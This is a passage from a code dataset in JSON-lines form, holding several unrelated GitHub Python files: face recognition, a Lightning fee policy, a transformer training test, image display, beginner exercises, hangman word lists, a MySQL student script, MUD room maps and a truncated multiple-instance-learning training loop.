cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)\n cv2.imshow('frame', frame)\n if cv2.waitKey(30) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"damianschmidt/face-recognition-LBPH","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24572038309","text":"import math\n\n\nclass FeePolicy:\n def __init__(self, base_fee, fee_rate, fee_spread, time_lock_delta):\n self.base_fee = base_fee\n self.fee_rate = fee_rate\n self.fee_spread = fee_spread\n self.time_lock_delta = time_lock_delta\n\n def calculate(self, channel):\n ratio = channel.local_balance / (channel.capacity - channel.commit_fee)\n # -1.0 = all funds local\n # +1.0 = all funds remote\n ratio = 1.0 - 2.0 * ratio\n coef = math.exp(self.fee_spread * ratio)\n fee_rate = 0.000001 * coef * self.fee_rate\n if fee_rate < 0.000001:\n fee_rate = 0.000001\n base_fee = self.base_fee\n time_lock_delta = self.time_lock_delta\n return base_fee, fee_rate, time_lock_delta\n","repo_name":"prusnak/suez","sub_path":"feepolicy.py","file_name":"feepolicy.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"77"} +{"seq_id":"71444185849","text":"from simpletransformers.classification import ClassificationModel\nimport pandas as pd\nimport logging\n\n\nlogging.basicConfig(level=logging.INFO)\ntransformers_logger = logging.getLogger(\"transformers\")\ntransformers_logger.setLevel(logging.WARNING)\n\n# Train and Evaluation data needs to be in a Pandas Dataframe of two columns. The first column is the text with type str, and the second column is the label with type int.\ntrain_data = [['Example sentence belonging to class 1', 1], ['Example sentence belonging to class 0', 0]]\ntrain_df = pd.DataFrame(train_data)\n\neval_data = [['Example eval sentence belonging to class 1', 1], ['Example eval sentence belonging to class 0', 0]]\neval_df = pd.DataFrame(eval_data)\n\n# Create a ClassificationModel\nmodel = ClassificationModel('roberta', 'roberta-base',use_cuda = False) # You can set class weights by using the optional weight argument\n\n# Train the model\nmodel.train_model(train_df)\n\n# Evaluate the model\nresult, model_outputs, wrong_predictions = model.eval_model(eval_df)\n","repo_name":"behrica/test-simple-transformers-clj","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41217088498","text":"from PIL.JpegImagePlugin import JpegImageFile\nfrom PIL import ImageDraw\nfrom PIL import Image\nfrom typing import *\n\ndef display(images: List[JpegImageFile], labels: List[str], w: int = 300, h: int = 200, left_color: str = \"white\", right_color: str = \"white\"):\n \"\"\"Display a dual image\n\n Args:\n images (List[JpegImageFile]): A list containing two images\n labels (List[str]): The labels of the images\n w (int, optional): The width. Defaults to 300.\n h (int, optional): The height. Defaults to 200.\n left_color (str, optional): The color of left label. Defaults to \"white\".\n right_color (str, optional): The color of the right label. Defaults to \"white\".\n\n Returns:\n PIL.Image: A pillow image\n \"\"\"\n \n # define a grid\n grid = Image.new('RGB', size=(w, h))\n \n # draw the grid\n draw = ImageDraw.Draw(grid, mode='RGB')\n \n # define the second box\n box = (w // 2, 0)\n \n # define the size of the images\n size = (w // 2, h)\n \n # add images to the grid\n grid.paste(images[0].resize(size))\n \n grid.paste(images[1].resize(size), box = box)\n \n # draw labels\n draw.text((0, 0), labels[0], fill=left_color)\n \n draw.text(box, labels[1], fill=right_color)\n \n return grid\n","repo_name":"Oumar199/Real_Fake_Face_Detection_app","sub_path":"fake_face_detection/utils/display_pil.py","file_name":"display_pil.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2970006878","text":"a = 1\nb = \"abc\"\nc = [\"3\", 1, \"fdg\"]\nd = {\n \"name\": \"Deepak\",\n \"surname\": \"Waghmare\",\n \"age\": 10,\n \"skills\": [\"science\", \"maths\"]\n }\n\n \n\n\n###List Examples\nprint(type(c[0]))\nprint(int(c[0])+2)\nprint(c[0]+str(c[1]))\nprint(c[0]+c[2])\nprint(c[-1])\nc.append(\"qwer\")\nc[1] = \"7\"\nprint(c)\n\n \n\n### Dict Examples\n\n \n\nprint(d[\"name\"])\nprint(type(d[\"name\"]))\nd[\"age\"] = 27\nd[\"height\"] = \"1.80m\"\nprint(d)\nprint(d[\"skills\"][0])\n\n \n\noutput = {\n \"msg\": [\n {\n \"aliasesA\": [\n {\n \"members\": [\n \"21:00:00:24:FF:7D:CE:1E\"\n ],\n \"name\": \"finance-esx_port1\"\n }\n ],\n \"zonesA\": [\n {\n \"members\": [\n \"P3000T_A_P2\",\n \"P3000T_B_P0\",\n \"finance-esx_port1\"\n ],\n \"name\": \"finance-esx_port1_PowerStore\"\n }\n ]\n }\n ]\n}\n\n \n\nwwn = output[\"msg\"][0][\"aliasesA\"][0][\"members\"][0]\nprint(wwn.lower())\nprint(d[\"name\"].upper())\nf = \"asdf\"\ng = \"qwer\"\nif f == g:\n print(\"ok\")\nelse:\n print(\"different\")\n\n \n\n#exercise 1 - compare alias name with zone members. Do a for loop to iterate over zone members\nprint(\"exercise1\")\nalias = output[\"msg\"][0][\"aliasesA\"][0][\"name\"]\nprint(alias.lower())\n\nfor x in output[\"msg\"][0][\"zonesA\"][0][\"members\"]:\n if alias.lower() == x.lower():\n print(\"alias is already in the zone\")\n else:\n pass\n\n#exercise 2 - add more key-value to the output dictionary: size, model\nprint(\"exercise2\")\noutput[\"msg\"].append({\"size\": 1000, \"model\": \"P3000T\"})\noutput[\"size\"]=1000\noutput[\"model\"]=\"P3000T\"\n\nprint(output[\"size\"])\n\n#exercise 3 - add output-size to d-age\nprint(\"exercise3\")\n\n#print(output[\"msg\"][1][\"size\"]+d[\"age\"])\n\nprint(output[\"size\"]+d[\"age\"])\n\n#exercise 4 - concatenate zonesA-name in uppercase with d-surname in lowercase and hyphen in between\nprint(\"exercise4\")\n\nprint(output[\"msg\"][0][\"zonesA\"][0][\"name\"].upper() + \"-\" + d[\"surname\"].lower())\n\n","repo_name":"waghmaredb/python-projects","sub_path":"General Learning/Lesson 1.py","file_name":"Lesson 1.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19697873986","text":"word_list_en = [\n'rickshaw', \n'schnapps', \n'scratch', \n'shiv', \n'snazzy', \n'sphinx', \n'spritz', \n'squawk', \n'staff', \n'strength', \n'strengths', \n'stretch', \n'stronghold', \n'stymied', \n'subway', \n'swivel', \n'syndrome', \n'thriftless', \n'thumbscrew', \n'topaz', \n'transcript', \n'transgress', \n'transplant', \n'triphthong', \n'twelfth', \n'twelfths', \n'unknown', \n'unworthy', \n'unzip', \n'uptown', \n'vaporize', \n'vixen', \n'vodka', \n'voodoo', \n'vortex', \n'voyeurism', \n'walkway', \n'waltz', \n'wave', \n'wavy', \n'waxy', \n'wellspring', \n'wheezy', \n'whiskey', \n'whizzing', \n'whomever', \n'wimpy', \n'witchcraft', \n'wizard', \n'woozy', \n'wristwatch', \n'wyvern', \n'xylophone', \n'yachtsman', \n'yippee', \n'yoked', \n'youthful', \n'yummy', \n'zephyr', \n'zigzag', \n'zigzagging', \n'zilch', \n'zipper', \n'zodiac', \n'zombie', \n]\n\n\n\n\nword_list_ua = [\n'характер', \n'хаос', \n'прозорість', \n'шантаж', \n'філолог', \n'кетчуп', \n'відвага', \n'звичка', \n'надія', \n'свідок', \n'бізнес', \n'хамелеон', \n'правило', \n'розвідка', \n'фестиваль', \n'харизма', \n'інстинкт', \n'інвестор', \n'реклама', \n'амбіції', \n'сарказм', \n'стартап', \n'розвага', \n'світанок', \n'заліковка', \n'влада', \n'запізнення', \n'дежавю', \n'незнайомець', \n'інтернет', \n'затишок', \n'продюсер', \n'кентавр', \n'єнот', \n'осінь', \n'скрипіння', \n'темперамент', \n'підробка', \n'натхнення', \n'анекдот', \n'видавництво', \n'драма', \n'перекладач', \n'абревіатура', \n'звіт', \n'акція', \n'абонемент', \n'солярій', \n'тир', \n'пелікан', \n'вікторина', \n'бестселер', \n'поліглот', \n'мутант', \n'альбінос', \n'діаспора', \n'розгадка', \n'зрада', \n'кислота', \n'артерія', \n'система', \n'жестикуляція', \n'радіо', \n'пранк', \n'гном', \n'голод', \n'материк', \n'слово', \n'запчастина', \n'штатив', \n'оренда', \n'монархія', \n'підписник', \n'рейтинг', \n'оскар', \n'провокація', \n'газ', \n'суперздібність', \n'секта', \n'логіка', \n'корупція', \n]","repo_name":"Yulia-Didun/100-Days-of-Code","sub_path":"DAY 7 (Hangman Game)/hangman_words.py","file_name":"hangman_words.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1734850287","text":"__author__ = 'nishkarsh'\n\nimport operator\nimport sys\nimport MySQLdb as mdb\nfrom time import sleep\nimport time\nfrom sys import argv\nimport networkx as nx\n\ncon = mdb.connect('10.5.18.66', '12CS10034', 'btech12', '12CS10034')\ncur = con.cursor()\n\ndef findAnswer():\n sql = \"select * from 12CS10034_orderedSeparation\"\n cur.execute(sql)\n #get values from the table created in previous parts and then create a new table outputting the values.\n for y in cur.fetchall():\n if y[2] != -1:\n sql = \"INSERT INTO 12CS10034_canfind VALUES('\"+y[0]+\"','\"+y[1]+\"','YES')\"\n cur.execute(sql)\n else:\n sql = \"INSERT INTO 12CS10034_canfind VALUES('\"+y[0]+\"','\"+y[1]+\"','NO')\"\n cur.execute(sql)\n\n con.commit()\n\nif __name__ == \"__main__\":\n\n #sql = \"CREATE TABLE IF NOT EXISTS 12CS10034_canfind(pid1 VARCHAR(9),firstName VARCHAR(50),pid2 VARCHAR(9),secondName VARCHAR(50),answer varchar(6),constraint primary key(pid1,pid2))\"\n sql = \"CREATE TABLE IF NOT EXISTS 12CS10034_canfind(firstName VARCHAR(50),secondName VARCHAR(50),answer varchar(6))\" # again the problem of primary key persists. Its better to use above table.\n cur.execute(sql)\n findAnswer()\n","repo_name":"nishkarsh-shastri/DBMS_lab_assignments","sub_path":"assignment5/part_2b.py","file_name":"part_2b.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19215126579","text":"# coding=gbk\nfrom _objects import Room,Exit\n\nexits = [\n\tExit('west', 'guanwai/caoguduo', False),\n\tExit('north', 'guanwai/xiaoyuan', False),\n\tExit('east', 'guanwai/milin1', False),\n]\nbaihe=Room('guanwai/baihe', u'白河', 'guanwai', 0, exits)\n\nexits = [\n\tExit('eastdown', 'guanwai/tianchi1', False),\n\tExit('southwest', 'guanwai/yuzhu', False),\n\tExit('north', 'guanwai/luming', False),\n]\nbaiyun=Room('guanwai/baiyun', u'白云峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/xiaoxiang', False),\n\tExit('south', 'guanwai/jishi', False),\n]\nbeicheng=Room('guanwai/beicheng', u'北城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/chuanchang', False),\n\tExit('east', 'guanwai/damenkan', False),\n]\nbingmian=Room('guanwai/bingmian', u'冰面', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/mantianxing', False),\n\tExit('east', 'guanwai/baihe', False),\n]\ncaoguduo=Room('guanwai/caoguduo', u'谷草垛', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/xuedi3', False),\n\tExit('east', 'guanwai/bingmian', False),\n]\nchuanchang=Room('guanwai/chuanchang', u'船厂', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/shizilu', False),\n]\nchufang=Room('guanwai/chufang', u'厨房', None, 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/pubu', False),\n\tExit('southwest', 'guanwai/longmen', False),\n]\ndamen=Room('guanwai/damen', u'达门', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/bingmian', False),\n\tExit('southeast', 'guanwai/ermenkan', False),\n]\ndamenkan=Room('guanwai/damenkan', u'大门坎子', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/jishi', False),\n\tExit('south', 'guanwai/tuyaoguan', False),\n\tExit('northeast', 'guanwai/huandi1', False),\n\tExit('east', 'guanwai/xuedi1', False),\n]\ndongcheng=Room('guanwai/dongcheng', u'东城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/damenkan', False),\n\tExit('east', 'guanwai/mantianxing', False),\n]\nermenkan=Room('guanwai/ermenkan', u'二门坎子', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/famu1', False),\n\tExit('southup', 'guanwai/luming', False),\n]\nfamu=Room('guanwai/famu', u'伐木场', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/famu', False),\n]\nfamu1=Room('guanwai/famu1', u'伐木场', 'guanwai', 0, exits)\n\nexits = [\n\tExit('westdown', 'guanwai/milin3', False),\n\tExit('east', 'guanwai/xiaotianchi', False),\n]\nheifengkou=Room('guanwai/heifengkou', u'黑风口', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/jingxiu', False),\n\tExit('south', 'guanwai/xiaowu', False),\n\tExit('east', 'guanwai/liangong', False),\n\tExit('north', 'guanwai/shizilu', False),\n]\nhouyuan=Room('guanwai/houyuan', u'后院', None, 0, exits)\n\nexits = [\n\tExit('westdown', 'guanwai/tianchi1', False),\n\tExit('north', 'guanwai/tianhuo', False),\n]\nhuagai=Room('guanwai/huagai', u'华盖峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/dongcheng', False),\n\tExit('northeast', 'guanwai/huandi2', False),\n]\nhuandi1=Room('guanwai/huandi1', u'荒路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/huandi1', False),\n\tExit('enter', 'guanwai/shanshenmiao', False),\n]\nhuandi2=Room('guanwai/huandi2', u'荒路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/houyuan', False),\n]\njingxiu=Room('guanwai/jingxiu', u'静修室', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/kedian', False),\n\tExit('south', 'guanwai/nancheng', False),\n\tExit('east', 'guanwai/dongcheng', False),\n\tExit('north', 'guanwai/beicheng', False),\n]\njishi=Room('guanwai/jishi', u'集市', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/majiu', False),\n\tExit('up', 'guanwai/kedian2', False),\n\tExit('east', 'guanwai/jishi', False),\n]\nkedian=Room('guanwai/kedian', u'客店', None, 0, exits)\n\nexits = [\n\tExit('down', 'guanwai/kedian', False),\n]\nkedian2=Room('guanwai/kedian2', u'客店二楼', None, 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/shanhaiguan', False),\n\tExit('southwest', 'beijing/road3', False),\n]\nlaolongtou=Room('guanwai/laolongtou', u'老龙头', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/houyuan', False),\n\tExit('south', 'guanwai/liangongs', False),\n\tExit('east', 'guanwai/liangonge', False),\n]\nliangong=Room('guanwai/liangong', u'练功房', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/liangong', False),\n]\nliangonge=Room('guanwai/liangonge', u'东练功房', None, 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/liangong', False),\n]\nliangongs=Room('guanwai/liangongs', u'南练功房', None, 0, exits)\n\nexits = [\n\tExit('southdown', 'guanwai/tianchi1', False),\n\tExit('west', 'guanwai/luming', False),\n\tExit('east', 'guanwai/tianhuo', False),\n\tExit('northeast', 'guanwai/damen', False),\n]\nlongmen=Room('guanwai/longmen', u'龙门峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/baiyun', False),\n\tExit('northdown', 'guanwai/famu', False),\n\tExit('east', 'guanwai/longmen', False),\n]\nluming=Room('guanwai/luming', u'鹿鸣峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/kedian', False),\n]\nmajiu=Room('guanwai/majiu', u'马厩', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/ermenkan', False),\n\tExit('southeast', 'guanwai/caoguduo', False),\n]\nmantianxing=Room('guanwai/mantianxing', u'满天星', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/baihe', False),\n\tExit('eastup', 'guanwai/milin2', False),\n]\nmilin1=Room('guanwai/milin1', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southup', 'guanwai/milin3', False),\n\tExit('westdown', 'guanwai/milin1', False),\n]\nmilin2=Room('guanwai/milin2', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('eastup', 'guanwai/heifengkou', False),\n\tExit('northdown', 'guanwai/milin2', False),\n]\nmilin3=Room('guanwai/milin3', u'密林', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road8', False),\n\tExit('north', 'guanwai/nancheng', False),\n]\nmuqiao=Room('guanwai/muqiao', u'木桥', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/tulu', False),\n\tExit('west', 'guanwai/rouguan', False),\n\tExit('south', 'guanwai/muqiao', False),\n\tExit('north', 'guanwai/jishi', False),\n]\nnancheng=Room('guanwai/nancheng', u'南城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road3', False),\n\tExit('northeast', 'guanwai/road4', False),\n]\nningyuan=Room('guanwai/ningyuan', u'宁远', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/damen', False),\n\tExit('westdown', 'guanwai/xiaotianchi', False),\n]\npubu=Room('guanwai/pubu', u'长白瀑布', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/shanhaiguan', False),\n\tExit('northeast', 'guanwai/road2', False),\n]\nroad1=Room('guanwai/road1', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road1', False),\n\tExit('northeast', 'guanwai/road3', False),\n]\nroad2=Room('guanwai/road2', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road2', False),\n\tExit('north', 'guanwai/ningyuan', False),\n]\nroad3=Room('guanwai/road3', u'官道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/ningyuan', False),\n\tExit('northeast', 'guanwai/road5', False),\n]\nroad4=Room('guanwai/road4', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/road4', False),\n\tExit('north', 'guanwai/road6', False),\n]\nroad5=Room('guanwai/road5', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road5', False),\n\tExit('north', 'guanwai/road7', False),\n]\nroad6=Room('guanwai/road6', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road6', False),\n\tExit('north', 'guanwai/road8', False),\n]\nroad7=Room('guanwai/road7', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/road7', False),\n\tExit('north', 'guanwai/muqiao', False),\n]\nroad8=Room('guanwai/road8', u'大道', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/nancheng', False),\n]\nrouguan=Room('guanwai/rouguan', u'香肉馆', None, 0, exits)\n\nexits = [\n\tExit('southeast', 'guanwai/laolongtou', False),\n\tExit('northeast', 'guanwai/road1', False),\n]\nshanhaiguan=Room('guanwai/shanhaiguan', u'山海关', 'guanwai', 0, exits)\n\nexits = [\n\tExit('out', 'guanwai/huandi2', False),\n]\nshanshenmiao=Room('guanwai/shanshenmiao', u'山神庙', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/tulu', False),\n]\nshichang=Room('guanwai/shichang', u'采石场', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/chufang', False),\n\tExit('south', 'guanwai/houyuan', False),\n\tExit('east', 'guanwai/taxue', False),\n]\nshizilu=Room('guanwai/shizilu', u'石路', None, 0, exits)\n\nexits = [\n]\nsonghuajiang=Room('guanwai/songhuajiang', u'松花江面', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/shizilu', False),\n]\ntaxue=Room('guanwai/taxue', u'踏雪院', None, 0, exits)\n\nexits = [\n\tExit('eastup', 'guanwai/huagai', False),\n\tExit('northup', 'guanwai/longmen', False),\n\tExit('south', 'guanwai/tianchi2', False),\n\tExit('westup', 'guanwai/baiyun', False),\n]\ntianchi1=Room('guanwai/tianchi1', u'白头山天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/tianchi1', False),\n]\ntianchi2=Room('guanwai/tianchi2', u'白头山天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/longmen', False),\n\tExit('south', 'guanwai/huagai', False),\n]\ntianhuo=Room('guanwai/tianhuo', u'天豁峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/yuzhu', False),\n]\ntiyun=Room('guanwai/tiyun', u'梯云峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/nancheng', False),\n\tExit('east', 'guanwai/shichang', False),\n]\ntulu=Room('guanwai/tulu', u'土路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/xiaoxiang', False),\n]\ntuwu=Room('guanwai/tuwu', u'小土屋', 'guanwai', 0, exits)\n\nexits = [\n\tExit('north', 'guanwai/dongcheng', False),\n]\ntuyaoguan=Room('guanwai/tuyaoguan', u'土窑馆', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/heifengkou', False),\n\tExit('eastup', 'guanwai/pubu', False),\n]\nxiaotianchi=Room('guanwai/xiaotianchi', u'小天池', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/xiaoyuan', False),\n\tExit('north', 'guanwai/houyuan', False),\n]\nxiaowu=Room('guanwai/xiaowu', u'小茅屋', None, 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/tuwu', False),\n\tExit('east', 'guanwai/beicheng', False),\n]\nxiaoxiang=Room('guanwai/xiaoxiang', u'小巷', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/baihe', False),\n\tExit('north', 'guanwai/xiaowu', False),\n]\nxiaoyuan=Room('guanwai/xiaoyuan', u'小院子', None, 0, exits)\n\nexits = [\n]\nxiuxishi=Room('guanwai/xiuxishi', u'休息室', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/dongcheng', False),\n\tExit('northeast', 'guanwai/xuedi2', False),\n]\nxuedi1=Room('guanwai/xuedi1', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/xuedi1', False),\n\tExit('east', 'guanwai/xuedi3', False),\n]\nxuedi2=Room('guanwai/xuedi2', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/xuedi2', False),\n\tExit('north', 'guanwai/chuanchang', False),\n]\nxuedi3=Room('guanwai/xuedi3', u'雪地', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northeast', 'guanwai/baiyun', False),\n\tExit('north', 'guanwai/tiyun', False),\n]\nyuzhu=Room('guanwai/yuzhu', u'玉柱峰', 'guanwai', 0, exits)\n\n","repo_name":"jiabiao/mushpy","sub_path":"hell/rooms/d/guanwai.py","file_name":"guanwai.py","file_ext":"py","file_size_in_byte":10912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72885469050","text":"\r\n# !/usr/bin/env python\r\nimport sys\r\nimport os\r\nos.environ[\"HDF5_USE_FILE_LOCKING\"] = \"FALSE\"\r\nimport yaml\r\nfrom pprint import pprint\r\n\r\nimport argparse\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom utils.utils import save_model, Struct, set_seed, Wandb_Writer\r\nfrom datasets.datasets import build_HDF5_feat_dataset\r\nfrom architecture.Attention import Attention_Gated as Attention\r\nfrom architecture.Attention import Attention_with_Classifier\r\nfrom architecture.network import Classifier_1fc, DimReduction\r\nfrom utils.utils import MetricLogger, SmoothedValue, adjust_learning_rate\r\nfrom utils.utils import get_cam_1d\r\nimport torchmetrics\r\nfrom timm.utils import accuracy\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndef get_arguments():\r\n parser = argparse.ArgumentParser('Patch classification training', add_help=False)\r\n parser.add_argument('--config', dest='config', default='config/camelyon_natural_supervised_config.yml',\r\n help='settings of Tip-Adapter in yaml format')\r\n parser.add_argument(\r\n \"--eval-only\", action=\"store_true\", help=\"evaluation only\"\r\n )\r\n parser.add_argument(\r\n \"--seed\", type=int, default=3, help=\"set the random seed to ensure reproducibility\"\r\n )\r\n parser.add_argument('--wandb_mode', default='disabled', choices=['offline', 'online', 'disabled'],\r\n help='the model of wandb')\r\n parser.add_argument(\r\n \"--n_shot\", type=int, default=-1, help=\"number of wsi images\"\r\n )\r\n parser.add_argument(\r\n \"--w_loss\", type=float, default=1.0, help=\"number of query token\"\r\n )\r\n parser.add_argument('--numGroup', default=4, type=int)\r\n parser.add_argument('--total_instance', default=4, type=int)\r\n parser.add_argument('--numGroup_test', default=4, type=int)\r\n parser.add_argument('--total_instance_test', default=4, type=int)\r\n parser.add_argument('--grad_clipping', default=5, type=float)\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef train_one_epoch(classifier, attention, dimReduction, UClassifier, criterion, data_loader, optimizer0,\r\n optimizer1, device, epoch, conf, log_writer=None, distill='MaxMinS'):\r\n \"\"\"\r\n Trains the given network for one epoch according to given criterions (loss functions)\r\n \"\"\"\r\n\r\n # Set the network to training mode\r\n classifier.train()\r\n dimReduction.train()\r\n attention.train()\r\n UClassifier.train()\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n metric_logger.add_meter('lr', SmoothedValue(window_size=1, fmt='{value:.6f}'))\r\n header = 'Epoch: [{}]'.format(epoch)\r\n print_freq = 100\r\n\r\n for data_it, data in enumerate(metric_logger.log_every(data_loader, print_freq, header)):\r\n # # Calculate and set new learning rate\r\n adjust_learning_rate(optimizer0, epoch + data_it/len(data_loader), conf)\r\n adjust_learning_rate(optimizer1, epoch + data_it/len(data_loader), conf)\r\n\r\n\r\n # for data_it, data in enumerate(data_loader, start=epoch * len(data_loader)):\r\n # Move input batch onto GPU if eager execution is enabled (default), else leave it on CPU\r\n # Data is a dict with keys `input` (patches) and `{task_name}` (labels for given task)\r\n tfeat_tensor = data['input'].to(device, dtype=torch.float32)\r\n tfeat_tensor = tfeat_tensor[0]\r\n tslideLabel = data['label'].to(device)\r\n\r\n instance_per_group = conf.total_instance // conf.numGroup\r\n feat_index = torch.randperm(tfeat_tensor.shape[0]).to(device)\r\n index_chunk_list = torch.tensor_split(feat_index, conf.numGroup)\r\n\r\n\r\n slide_pseudo_feat = []\r\n slide_sub_preds = []\r\n slide_sub_labels = []\r\n\r\n for tindex in index_chunk_list:\r\n slide_sub_labels.append(tslideLabel)\r\n subFeat_tensor = torch.index_select(tfeat_tensor, dim=0, index=tindex)\r\n tmidFeat = dimReduction(subFeat_tensor)\r\n tAA = attention(tmidFeat).squeeze(0)\r\n tattFeats = torch.einsum('ns,n->ns', tmidFeat, tAA) ### n x fs\r\n tattFeat_tensor = torch.sum(tattFeats, dim=0).unsqueeze(0) ## 1 x fs\r\n tPredict = classifier(tattFeat_tensor) ### 1 x 2\r\n slide_sub_preds.append(tPredict)\r\n\r\n patch_pred_logits = get_cam_1d(classifier, tattFeats.unsqueeze(0)).squeeze(0) ### cls x n\r\n patch_pred_logits = torch.transpose(patch_pred_logits, 0, 1) ## n x cls\r\n patch_pred_softmax = torch.softmax(patch_pred_logits, dim=1) ## n x cls\r\n\r\n _, sort_idx = torch.sort(patch_pred_softmax[:, -1], descending=True)\r\n topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx_min = sort_idx[-instance_per_group:].long()\r\n topk_idx = torch.cat([topk_idx_max, topk_idx_min], dim=0)\r\n\r\n MaxMin_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx) ##########################\r\n max_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx_max)\r\n af_inst_feat = tattFeat_tensor\r\n\r\n if distill == 'MaxMinS':\r\n slide_pseudo_feat.append(MaxMin_inst_feat)\r\n elif distill == 'MaxS':\r\n slide_pseudo_feat.append(max_inst_feat)\r\n elif distill == 'AFS':\r\n slide_pseudo_feat.append(af_inst_feat)\r\n\r\n slide_pseudo_feat = torch.cat(slide_pseudo_feat, dim=0) ### numGroup x fs\r\n\r\n ## optimization for the first tier\r\n slide_sub_preds = torch.cat(slide_sub_preds, dim=0) ### numGroup x fs\r\n slide_sub_labels = torch.cat(slide_sub_labels, dim=0) ### numGroup\r\n loss0 = criterion(slide_sub_preds, slide_sub_labels).mean()\r\n optimizer0.zero_grad()\r\n loss0.backward(retain_graph=True)\r\n torch.nn.utils.clip_grad_norm_(dimReduction.parameters(), conf.grad_clipping)\r\n torch.nn.utils.clip_grad_norm_(attention.parameters(), conf.grad_clipping)\r\n torch.nn.utils.clip_grad_norm_(classifier.parameters(), conf.grad_clipping)\r\n optimizer0.step()\r\n\r\n ## optimization for the second tier\r\n gSlidePred = UClassifier(slide_pseudo_feat)\r\n loss1 = criterion(gSlidePred, tslideLabel).mean()\r\n optimizer1.zero_grad()\r\n loss1.backward()\r\n torch.nn.utils.clip_grad_norm_(UClassifier.parameters(), 